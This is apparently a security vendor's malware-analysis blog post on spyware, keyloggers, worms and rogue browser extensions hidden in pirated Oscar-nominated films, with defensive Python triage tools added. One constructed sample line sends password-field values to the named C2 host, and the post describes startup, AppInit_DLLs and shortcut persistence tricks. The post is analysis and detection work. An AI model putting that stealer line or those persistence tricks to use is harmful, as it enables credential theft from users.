Online piracy is a persistent problem for artists, creators, and unsuspecting users who fall victim to cyber attackers that leverage piracy to distribute malware. While online piracy has been made illegal in many countries, it is still an act perpetrated daily worldwide. In fact, a recent study by MUSO found that the number of visits to online piracy sites has increased by more than 20% compared to last year.
With the 95th Academy Awards premiering later this month, I decided to dive into the world of Hollywood film piracy and focus on some of the biggest movies from 2022. Our team collected data from January 1, 2022, through February 15, 2023, derived solely from ReasonLabs users running RAV EDR and RAV Endpoint Protection, who are located in over 180 countries around the world.
The data shows thousands of instances of threats, including Trojans, infostealers, spyware, keyloggers, and other malware, inside files claiming to be one of the films listed below that received top nominations:
Our research shows an alignment between the number of infected files attributed to each film and the number of nominations it received. “Everything Everywhere All at Once” has 11 nominations, had the most infected files, and is the front-runner to win Best Picture. The Best Picture winner typically sees a significant increase in pirated downloads, so it seems the dark web has spoken and cybercriminals themselves have voted for “Everything Everywhere All at Once” as the Best Picture winner.
After “Everything Everywhere All at Once”, “Avatar: The Way of Water” and the other films up for Best Picture also received numerous nominations and displayed large numbers of cyber threats. Unsurprisingly, threat actors are choosing to latch on to the Oscar favorites to lure fans looking for an easy download.
Let’s discuss the top five most common threat types seen lurking in downloaded files claiming to be Oscar-nominated movies.
The spyware establishes persistence by placing an executable at “appdata\roaming\microsoft\windows\start menu\programs\startup\svchost..exe” (note the doubled dot), so that it runs again after every restart.
It masquerades as a Microsoft file by setting “Microsoft” in the Publisher metadata field, but the file is not signed. It is written in .NET, which in this case made it easy to decompile and see what it is up to.
From the code, we learn that the file steals various types of documents from the user such as .doc, .xls, .xlsx, .docx, and .pdf.
The documents are then sent to the attacker’s email address, “dspyware2011[@]gmail[.]com”. The spyware also contains a second address, “win7mailer511[@]gmail[.]com”, whose login password is hard-coded in the binary.
The tar archives it builds from the stolen documents are written to either "\\Windows\\system\\wsystem.vx" or "\\Users\\Public\\Documents\\wsystem.vx" and are then emailed out by the spyware.
Accordingly, the code handles two deployment scenarios and checks which one applies: it runs either as “\\Documents\\suchost..exe” or as "\\svchost..exe".
One function in the code emails the stolen files to the attacker as attachments. It composes a message containing identifying information about the victim and starts an SMTP client to exfiltrate the data, authenticating with the attacker’s hard-coded email address and password:
In addition, it will replicate itself into other folders, calling itself “movie.exe”.
dspyware2011[@]gmail[.]com
win7mailer511[@]gmail[.]com
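Because this sample is a .NET assembly, its string literals are stored as UTF-16LE, and an ASCII-only `strings` pass will miss exactly the indicators above (addresses, SMTP host, drop paths). The following added example is not the post's own tooling: it extracts both ASCII and UTF-16LE strings from a binary and pulls out email addresses, SMTP hosts and Windows paths, then defangs them in the `[@]` / `[.]` style used in this post. The byte blob is a constructed stand-in for the real sample, laid out the way a .NET assembly would store those strings.

```python
import re

# Constructed sample (not the real binary): a few strings laid out the way a .NET
# assembly stores them. .NET string literals are UTF-16LE, so an ASCII-only
# `strings` pass misses the email address and the drop path below. The extra
# NUL after the ASCII host keeps the UTF-16 scanner from latching onto its tail.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12
    + "dspyware2011@gmail.com".encode("utf-16-le") + b"\x00\x00"
    + b"smtp.gmail.com\x00\x00"                      # ASCII, as a config blob might hold it
    + "\\Users\\Public\\Documents\\wsystem.vx".encode("utf-16-le") + b"\x00\x00"
    + b"\x01\x02\x03\x04"
)

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
SMTP_HOST_RE = re.compile(r"\bsmtp\.[A-Za-z0-9.-]+", re.IGNORECASE)
WIN_PATH_RE = re.compile(r"(?:[A-Za-z]:)?\\[\w .$-]+(?:\\[\w .$-]+)+")


def extract_strings(blob: bytes, min_len: int = 6, utf16: bool = True) -> list:
    """Printable ASCII strings, plus UTF-16LE strings unless utf16=False."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(blob)]
    if utf16:
        utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
        found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(blob)]
    return found


def triage(blob: bytes) -> dict:
    """Pull exfiltration-related indicators out of the binary's strings."""
    iocs = {"emails": set(), "smtp_hosts": set(), "paths": set()}
    for s in extract_strings(blob):
        iocs["emails"].update(EMAIL_RE.findall(s))
        iocs["smtp_hosts"].update(h.lower() for h in SMTP_HOST_RE.findall(s))
        iocs["paths"].update(WIN_PATH_RE.findall(s))
    return {k: sorted(v) for k, v in iocs.items()}


def defang(indicator: str) -> str:
    """Neutralise an indicator for a report, matching the [@] / [.] style above."""
    return indicator.replace("@", "[@]").replace(".", "[.]")


if __name__ == "__main__":
    for kind, values in triage(SAMPLE_BINARY).items():
        for v in values:
            print(f"{kind}: {defang(v)}")
```

Run it against a real sample by reading the file into `SAMPLE_BINARY`'s place; `extract_strings(blob, utf16=False)` shows what a plain ASCII pass would have missed.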
This file is a malicious installer that downloads additional files into the “C:\programdata” folder under deceptive names. Some are written with a “.jpg” suffix even though they are actually .exe, .js, or .html files. The installer then sets the hidden attribute on those files and executes an encoded VBS script (V29ybQ.jpg) with the parameter “pyld.”
The extension’s JavaScript is obfuscated:
The manifest file presents an extension with the deceptive name “Chrome Webstore” and a matching description: “Discover great apps, games, extensions and themes for Google Chrome.”
Below we can see that the extension injects its JavaScript into every page the user opens in the browser (the “<all_urls>” match pattern inside “content_scripts”). It also loads an HTML file that it dropped into the extension folder under AppData.
Decoding the hex-escaped portion of the obfuscated JavaScript yields an array of interesting strings, including its C2 (command-and-control) address: http[://]z3jhymjlcg[.]x10[.]bz. The strings also show that it targets password input fields in the page’s document (window.document) in order to steal their contents.
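The decoding step above is mechanical, so here is an added example (not the post's own tooling, and not the extension's real code) that does it: it decodes `\xHH` / `\uHHHH` escapes, recovers the obfuscator's string table, inlines the `_0x....[n]` references back into the content script, and reports any URL it finds. The sample script is constructed for this example; the C2 host is the one named above, while the `input[type=password]` selector and the `fetch` call are assumed, since the post does not print the deobfuscated code. Real obfuscators often add array rotation or RC4 on top of this, which this example does not handle.

```python
import re


def _hex_escape(text: str) -> str:
    """Encode text the way simple JS obfuscators do: \\x68\\x74\\x74\\x70..."""
    return "".join(f"\\x{ord(c):02x}" for c in text)


# Constructed sample: a hex-escaped string table referenced by index from the
# content script. Only the host is from the post; the rest is assumed.
SAMPLE_JS = (
    'var _0x4f2a=["' + _hex_escape("http://z3jhymjlcg.x10.bz") + '","'
    + _hex_escape("input[type=password]") + '","' + _hex_escape("value") + '"];\n'
    "document.querySelectorAll(_0x4f2a[1]).forEach(function(e){"
    'fetch(_0x4f2a[0]+"/?p="+encodeURIComponent(e[_0x4f2a[2]]));});'
)

ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
ARRAY_RE = re.compile(r"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];", re.S)
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[^\s\"']*)?")


def decode_escapes(js: str) -> str:
    """Turn \\xHH and \\uHHHH escapes back into characters."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), js)


def string_literals(js: str) -> list:
    """All non-empty string literals in the source, with escapes decoded."""
    return [decode_escapes(a or b) for a, b in STRING_RE.findall(js) if a or b]


def inline_string_array(js: str) -> str:
    """Replace _0xNAME[i] references with the decoded literal they point to."""
    m = ARRAY_RE.search(js)
    if not m:
        return js
    name, table = m.group(1), string_literals(m.group(2))
    ref_re = re.compile(re.escape(name) + r"\[(\d+)\]")
    return ref_re.sub(lambda r: '"' + table[int(r.group(1))] + '"', js)


def extract_network_iocs(js: str) -> list:
    """URLs hidden in the string table: C2 candidates."""
    urls = set()
    for s in string_literals(js):
        urls.update(URL_RE.findall(s))
    return sorted(urls)


def touches_password_fields(js: str) -> bool:
    """True if any decoded literal references password inputs."""
    return any("password" in s.lower() for s in string_literals(js))


if __name__ == "__main__":
    print(inline_string_array(SAMPLE_JS))
    print("C2 candidates:", extract_network_iocs(SAMPLE_JS))
    print("password fields targeted:", touches_password_fields(SAMPLE_JS))
```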
193.32.161.73
z3jhymjlcg[.]x10[.]bz
The Bat Worm is another unsigned file, this time with the publisher field set to '$ i l e n t $ t o r m'. Its icon mimics the Windows folder icon, so a user would think they are opening a folder rather than an executable (if file extensions are hidden in the folder view, which is the Windows default).
The executable drops three files to disk: “folder.bat”, “folder.exe” and “autorun.inf”, and sets their attributes to hidden so the user will not see them in the folder. It also creates a scheduled task named “folder” that runs “folder.exe”.
The batch script copies these files to the root of every drive on the device and then recursively into each sub-folder.
To hide from the user, the keylogger pads its filename with multiple spaces so the extension is pushed out of sight at first glance, and it also uses a folder icon.
This executable drops a script that continuously records the victim’s keystrokes and sends all of the captured data to its server at rscamnl[.]com.
More interesting strings can be found in this sample:
In addition, the keylogger creates persistence under “\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”, so it continues to execute after the system restarts.
A widespread piece of malware found on download portals delivers a persistent malicious browser extension. Although the Trojan arrives disguised as a pirated movie download, it installs only malware and no movie. It achieves persistence by writing the path of a malicious DLL, dropped to the temp folder, into the AppInit_DLLs registry value; with AppInit_DLLs, that DLL is loaded into every process that loads user32.dll. (Windows 8 and later ignore AppInit_DLLs when Secure Boot is enabled, so this technique only takes hold on machines where that protection is off.)
The malicious extension is not published in the Chrome Web Store but is installed locally from a temp folder. It is often called “GoogleDoc” or “App” and takes over the browser’s search engine. Because the extension is not on the Chrome Web Store, the number of victims is hard to measure, but more than 50,000 ReasonLabs users have been protected against this threat.
The Trojan ensures the extension is loaded every time the browser starts by modifying the browser shortcut to add extra command-line parameters that instruct the browser to load the local extension as well:
The installer kills all browser processes via WMI and drops DLLs and the extension files to disk in the folder %userprofile%\appdata\local\windowsapp.
It then launches cmd.exe to run the “install.bat” script, which adds persistence through the AppInit_DLLs registry value. This loads the malicious DLL, which was also dropped to its execution folder as %userprofile%\appdata\local\windowsapp\ext.dll.
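Both persistence mechanisms described above (the AppInit_DLLs value and the tampered browser shortcut) are cheap to audit. The following added example is not the post's tooling: it takes a snapshot of the two registry values that govern AppInit_DLLs and the resolved command lines of browser shortcuts, both supplied as plain Python data so it runs off-box, and flags DLLs or extension directories that live in user-writable locations. The post does not quote the exact switch the Trojan adds; `--load-extension` (and its companion `--disable-extensions-except`) are the Chromium switches that side-load an unpacked extension directory, which is what the text describes, so the sample shortcut assumes that. The registry path and file paths in the sample are constructed.

```python
import re

APPINIT_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"

# Constructed snapshot of the two values under APPINIT_KEY; on a live host you
# would read them with winreg or `reg query` and pass the result in.
SAMPLE_APPINIT = {
    "LoadAppInit_DLLs": 1,
    "AppInit_DLLs": r"C:\Users\victim\AppData\Local\windowsapp\ext.dll",
}

# Constructed: target + arguments resolved from browser .lnk files. The
# --load-extension switch is assumed; the post does not print the real args.
SAMPLE_SHORTCUTS = {
    "Google Chrome.lnk": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                         r'--load-extension="C:\Users\victim\AppData\Local\windowsapp\ext" '
                         r'--no-default-browser-check',
    "Firefox.lnk": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
}

USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
SIDELOAD_RE = re.compile(
    r'--(load-extension|disable-extensions-except)=(?:"([^"]+)"|([^\s"]+))')


def is_user_writable(path: str) -> bool:
    """Crude location heuristic: anything under a user profile, ProgramData or Temp."""
    return any(m in path.lower() for m in USER_WRITABLE_MARKERS)


def check_appinit(values: dict) -> list:
    """(severity, message) for each DLL listed in AppInit_DLLs.

    AppInit_DLLs is space- or comma-separated (paths with spaces need 8.3 names),
    and only takes effect when LoadAppInit_DLLs == 1.
    """
    findings = []
    enabled = int(values.get("LoadAppInit_DLLs") or 0) == 1
    for dll in re.split(r"[,\s]+", (values.get("AppInit_DLLs") or "").strip()):
        if not dll:
            continue
        if is_user_writable(dll):
            sev = "high" if enabled else "medium"   # medium: staged but not yet loading
            findings.append((sev, f"AppInit_DLLs loads {dll} from a user-writable path"))
        else:
            findings.append(("low", f"AppInit_DLLs is set: {dll}"))
    return findings


def check_shortcut(cmdline: str) -> list:
    """(severity, message) for each extension directory side-loaded via the shortcut."""
    findings = []
    for switch, quoted, bare in SIDELOAD_RE.findall(cmdline):
        for ext_dir in (quoted or bare).split(","):
            sev = "high" if is_user_writable(ext_dir) else "medium"
            findings.append((sev, f"--{switch} side-loads extension from {ext_dir}"))
    return findings


def audit(appinit_values: dict, shortcuts: dict) -> list:
    """Combine both checks into (where, severity, message) triples."""
    findings = [("AppInit", sev, msg) for sev, msg in check_appinit(appinit_values)]
    for name, cmd in shortcuts.items():
        findings += [(name, sev, msg) for sev, msg in check_shortcut(cmd)]
    return findings


if __name__ == "__main__":
    for where, sev, msg in audit(SAMPLE_APPINIT, SAMPLE_SHORTCUTS):
        print(f"[{sev}] {where}: {msg}")
```

A clean machine should produce no findings at all: an empty AppInit_DLLs value and browser shortcuts with no extension-loading switches.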
The installer contains the script, the malicious extension files, and the DLL.
Something is clearly wrong with this extension just from its manifest file: it calls itself “Google Docs” and grants itself the most sensitive permissions:
The strings inside appext.dll show that it handles the extension’s installation and persistence.
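Both extensions in this post give themselves away in `manifest.json`: a first-party-sounding name, a content script matched to `<all_urls>` (the “Chrome Webstore” one), or a long list of sensitive permissions plus a search-provider override (the “Google Docs” one). The following added example, which is not the post's tooling, scores a manifest on those signals. The three manifests are constructed from the post's description; the real ones appear there only as screenshots, and the `search_url` is made up.

```python
import json

# Constructed manifests modelled on the post's description of the two extensions,
# plus a benign one for contrast. The search_url is made up.
MANIFEST_WEBSTORE = json.dumps({
    "manifest_version": 2,
    "name": "Chrome Webstore",
    "description": "Discover great apps, games, extensions and themes for Google Chrome.",
    "version": "1.0",
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"],
                         "run_at": "document_start"}],
    "background": {"page": "page.html"},
})
MANIFEST_GDOCS = json.dumps({
    "manifest_version": 2,
    "name": "Google Docs",
    "version": "2.1",
    "permissions": ["tabs", "webRequest", "webRequestBlocking", "<all_urls>",
                    "storage", "management"],
    "chrome_settings_overrides": {"search_provider": {
        "name": "Search", "keyword": "s", "encoding": "UTF-8", "is_default": True,
        "search_url": "https://search.invalid/?q={searchTerms}"}},
})
MANIFEST_BENIGN = json.dumps({
    "manifest_version": 3, "name": "Tab Counter", "version": "0.1",
    "permissions": ["storage"], "action": {"default_popup": "popup.html"},
})

# Weights are a triage heuristic, not a Chrome policy.
RISKY_PERMISSIONS = {
    "<all_urls>": 3, "debugger": 3, "nativeMessaging": 3,
    "webRequest": 2, "webRequestBlocking": 2, "cookies": 2, "proxy": 2,
    "management": 2, "tabs": 1, "history": 1, "clipboardRead": 1,
}
IMPERSONATED_BRANDS = ("google", "chrome", "microsoft", "docs", "webstore")


def triage_manifest(text: str) -> dict:
    """Score a manifest.json; higher means more worth a closer look."""
    m = json.loads(text)
    name = m.get("name", "")
    score, findings = 0, []
    if any(b in name.lower() for b in IMPERSONATED_BRANDS):
        score += 2
        findings.append(f"name '{name}' impersonates a first-party product")
    # MV3 moves host patterns into host_permissions; check both places.
    perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    for p in sorted(perms):
        if p in RISKY_PERMISSIONS:
            score += RISKY_PERMISSIONS[p]
            findings.append(f"permission {p}")
        elif p.startswith(("*://", "http://", "https://")):
            score += 1
            findings.append(f"host permission {p}")
    for cs in m.get("content_scripts", []):
        if "<all_urls>" in cs.get("matches", []):
            score += 3
            findings.append(f"content script {cs.get('js')} injected into every page")
    if "chrome_settings_overrides" in m:
        score += 2
        findings.append("chrome_settings_overrides: hijacks search provider/homepage/startup")
    return {"name": name, "score": score, "findings": findings}


if __name__ == "__main__":
    for text in (MANIFEST_WEBSTORE, MANIFEST_GDOCS, MANIFEST_BENIGN):
        r = triage_manifest(text)
        print(f"{r['name']!r}: score {r['score']}")
        for f in r["findings"]:
            print("  -", f)
```

Point it at the `manifest.json` of any extension directory loaded from AppData or a temp folder, which is where both of the post's extensions were installed from.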
IOCs
Examples of identifiers for the Trojan executables (there are more identifiers for each category; we include the most prevalent here):
It is important to note that pirated movie downloads often come with subtitle files, and these pose a major threat to users. Even if the movie file itself contains no executable, the “subtitle” file might be one.
The same applies to the subtitle download sites users visit. They can “accidentally” redirect users to a malicious website that tries to get them to download files, even when those files have nothing to do with the subtitle they wanted.
For example, we have seen malware hiding in files with names like the ones below (note the executable extension behind the subtitle-looking name):
subtitle triangle.of.sadness.2022.1080p.webdl....exe
subtitle everything everywhere all at once 2022....exe
All.quiet.on.the.western.front.2022.1080p.webrip.srt.exe
the banshees of inisherin (2022) [1080p] [webrip] [5.1] [yts.mx]\download-subtitle_pllqcy0y.exe
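Every sample in this post that reaches the user does so by lying about what kind of file it is: a PE or HTML file stored as “.jpg” in ProgramData, a folder icon on an executable, spaces padding a keylogger's name so the extension scrolls out of view, doubled dots as in “svchost..exe”, and the “.srt.exe” subtitle lures above. The following added example, not the post's tooling, scans a directory for those tricks, checking both the name and the file's magic bytes, and also reports the hidden attribute when run on Windows. The sample files it creates are constructed for the example; only the “All.quiet” name is taken from the list above.

```python
import os
import stat
import tempfile

EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".hta", ".ps1", ".msi", ".lnk"}
LOOKALIKE_EXTS = {".srt", ".sub", ".mp4", ".mkv", ".avi", ".jpg", ".png", ".txt", ".pdf"}
LURE_WORDS = ("subtitle", "download", "movie", "1080p", "webrip", "webdl")
MAGIC = [(b"MZ", "pe"), (b"%PDF", "pdf"), (b"\xff\xd8\xff", "jpeg"), (b"\x89PNG", "png"),
         (b"PK\x03\x04", "zip"), (b"<!DOCTYPE", "html"), (b"<html", "html"),
         (b"<script", "html")]
PADDED_NAME = "movie" + " " * 30 + ".exe"   # constructed, keylogger-style padding


def name_findings(filename: str) -> list:
    """Deceptions that live in the name alone."""
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    findings = []
    if ext in EXECUTABLE_EXTS:
        inner = os.path.splitext(stem.rstrip())[1].lower()
        if inner in LOOKALIKE_EXTS:
            findings.append(f"double extension {inner}{ext}")
        if any(w in stem.lower() for w in LURE_WORDS):
            findings.append(f"executable named like a download lure ({ext})")
    padding = len(stem) - len(stem.rstrip())
    if padding >= 3:
        findings.append(f"{padding} spaces pad the name to push {ext} out of view")
    if ".." in base:
        findings.append("doubled dots in name (svchost..exe style)")
    return findings


def content_type(path: str) -> str:
    """Identify the file by its first bytes, ignoring the extension."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def content_findings(path: str) -> list:
    """Mismatches between what the extension claims and what the bytes say."""
    findings = []
    kind = content_type(path)
    ext = os.path.splitext(path)[1].lower()
    if kind == "pe" and ext not in EXECUTABLE_EXTS:
        findings.append(f"PE image stored as {ext or 'no extension'}")
    elif kind == "html" and ext in LOOKALIKE_EXTS:
        findings.append(f"HTML/script stored as {ext}")
    attrs = getattr(os.stat(path), "st_file_attributes", 0)   # Windows only; 0 elsewhere
    if attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2):
        findings.append("hidden attribute set")
    return findings


def scan_dir(directory: str) -> dict:
    """filename -> list of findings for every regular file in the directory."""
    results = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            results[name] = name_findings(name) + content_findings(path)
    return results


def build_sample_dir() -> str:
    """Constructed files reproducing the tricks the post describes."""
    d = tempfile.mkdtemp(prefix="oscar-")
    samples = {
        "cover.jpg": b"MZ\x90\x00" + b"\x00" * 60,                    # PE hiding as .jpg
        "gallery.jpg": b"<script>location='about:blank';</script>",   # script as .jpg
        "All.quiet.on.the.western.front.2022.1080p.webrip.srt.exe": b"MZ\x90\x00",
        PADDED_NAME: b"MZ\x90\x00",
        "readme.txt": b"Thanks for downloading!",
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return d


if __name__ == "__main__":
    for name, findings in scan_dir(build_sample_dir()).items():
        print(repr(name), "->", findings or "clean")
```

Run `scan_dir` over a download folder or `C:\ProgramData`; anything with a finding deserves a second look before it is opened.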
There are many tools users can utilize to shore up their cybersecurity. These include physical and digital products, but also general education. The continued push for cyber awareness by security companies and AV providers is paramount to reducing the vulnerabilities of home users and the overall success rate of next-generation attacks.
Security tools such as DNS filtering, VPNs, EDR for the home, and more should be used by individuals, not just large corporations. Ultimately, home users’ best chance of fighting off modern cyber threats lies in the use of endpoint protection.